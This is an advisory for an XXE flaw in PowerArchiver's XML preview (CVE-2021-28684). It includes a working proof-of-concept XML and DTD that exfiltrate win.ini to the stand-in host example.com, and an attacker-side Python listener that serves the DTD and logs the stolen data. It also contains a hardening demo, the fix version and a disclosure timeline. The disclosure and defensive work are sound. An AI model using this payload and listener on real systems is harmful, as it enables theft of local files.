CVE-2021-28684: XXE vulnerability in PowerArchiver <= 20.00.73
The parser used for previews of XML files in PowerArchiver <= 20.00.73 allows processing of external entities (XXE), which can lead to unauthorized access to local resources. Minimal user interaction is required when conducting the attack, as the user only has to select the XML file in order for the preview to load.
PoC XML file:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://example.com/test.dtd">
%sp;
%param1;
%exfil;
]>
Content of test.dtd:
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://example.com/?%data;'>">
Once the file is previewed, the application makes two requests to the remote server. First it downloads test.dtd; once the parameter entities declared there are loaded, %exfil; is resolved and the content of the referenced file (win.ini in this PoC) is sent to the server as the query string of the second request. Because the data travels inside a URL, this out-of-band channel is limited to files whose content the parser accepts as part of a URI; a small text file such as win.ini is a reliable first target.
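The attacker-side half of the exchange above, as an added example (not part of the original advisory): a small Python listener that serves test.dtd on the first request and records whatever the vulnerable preview parser sends back in the query string of the second. The callback base URL http://example.com, the port, and the sample request paths are assumptions chosen to match the PoC; in a real test they point at the host you control.

```python
"""Attacker-side listener for the out-of-band XXE exchange in the PoC.

Request 1: GET /test.dtd      -> serve the DTD that declares %data; and %exfil;
Request 2: GET /?<file data>  -> record the exfiltrated file content
"""
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed values: the listener's public URL and the file targeted by the PoC.
CALLBACK_BASE = "http://example.com"
TARGET_FILE = "file:///c:/windows/win.ini"


def build_dtd(target_file: str, callback_base: str) -> str:
    """Return the test.dtd from the PoC, parameterised on the file to read and
    the server that receives it. The parser expands %data; while loading this
    external DTD, so the SYSTEM URL of %exfil; ends up carrying the file."""
    return (
        '<!ENTITY % data SYSTEM "{0}">\n'
        '<!ENTITY % param1 "<!ENTITY % exfil SYSTEM \'{1}/?%data;\'>">\n'
    ).format(target_file, callback_base)


def decode_exfil(request_path: str):
    """Recover the exfiltrated content from the second request's path.
    Returns None for paths without a query string (e.g. /test.dtd itself).
    unquote() handles both raw and percent-encoded content, since parsers
    differ in how they embed the data in the URL."""
    parsed = urllib.parse.urlsplit(request_path)
    if not parsed.query:
        return None
    return urllib.parse.unquote(parsed.query)


class ExfilHandler(BaseHTTPRequestHandler):
    received = []  # class-level log of exfiltrated payloads

    def do_GET(self):
        if self.path == "/test.dtd":
            body = build_dtd(TARGET_FILE, CALLBACK_BASE).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        data = decode_exfil(self.path)
        if data is not None:
            ExfilHandler.received.append(data)
            print("exfiltrated:\n" + data)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    # Port 80 matches the PoC's URL (no explicit port) and needs privileges;
    # if you bind elsewhere, put the port into CALLBACK_BASE as well.
    HTTPServer(("0.0.0.0", 80), ExfilHandler).serve_forever()
```

Seeing only the first request (the DTD fetch) and never the second is itself a useful signal: the parser loads external DTDs but either refuses the file read or cannot place the content into a URL.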
The vulnerability has been fixed in PowerArchiver 20.10.02.
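PowerArchiver's preview code and the exact fix are not public, so the following is an added illustration (not the vendor's code) of the setting that makes the difference, using Python's xml.sax (expat): the same untrusted XML file is parsed once with external entity resolution enabled, as in the vulnerable preview, and once with it disabled. The in-band entity that reads a local file, the temporary "secret" file, and its content are constructed for the demo; the page's own PoC uses parameter entities and an external DTD to go out-of-band, which this offline example does not need.

```python
"""Vulnerable versus hardened handling of external entities in an XML preview.

With external general entities enabled, previewing an untrusted file reads a
local file into the displayed text; with them disabled (Python's default
since 3.7.1), the entity contributes nothing.
"""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class _TextCollector(xml.sax.ContentHandler):
    """Gathers character data, i.e. what a preview pane would display."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def preview_xml(xml_text: str, resolve_external: bool) -> str:
    """Parse untrusted XML and return the text a preview would show.
    resolve_external=True mirrors the vulnerable configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(xml_text))
    return "".join(handler.parts)


def build_poc(local_file_uri: str) -> str:
    """Minimal XXE document: a general entity pointing at a local file."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE r [\n'
        '  <!ELEMENT r ANY>\n'
        '  <!ENTITY xxe SYSTEM "{0}">\n'
        ']>\n'
        '<r>&xxe;</r>\n'
    ).format(local_file_uri)


def demo():
    """Return (vulnerable_output, hardened_output) for a constructed secret file."""
    secret = "api_token=constructed-secret-value\n"  # constructed sample content
    with tempfile.NamedTemporaryFile("w", suffix=".ini", delete=False) as f:
        f.write(secret)
        path = f.name
    try:
        poc = build_poc(pathlib.Path(path).as_uri())
        vulnerable = preview_xml(poc, resolve_external=True)
        hardened = preview_xml(poc, resolve_external=False)
    finally:
        os.unlink(path)
    return vulnerable, hardened


if __name__ == "__main__":
    v, h = demo()
    print("external entities enabled :", repr(v))
    print("external entities disabled:", repr(h))
```

A preview feature that only ever needs to display an XML file should refuse external general entities, external parameter entities and external DTD loading together; the page's PoC needs the latter two, while the in-band variant above needs only the first, and a parser hardened against one is not necessarily hardened against the others.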
Timeline:
03/12/2021 – vulnerability reported to the vendor
03/18/2021 – CVE requested, assigned CVE-2021-28684
04/19/2021 – vulnerability fixed in PowerArchiver 20.10.02 [PA-2886]
06/21/2021 – CVE-2021-28684 updated with details and published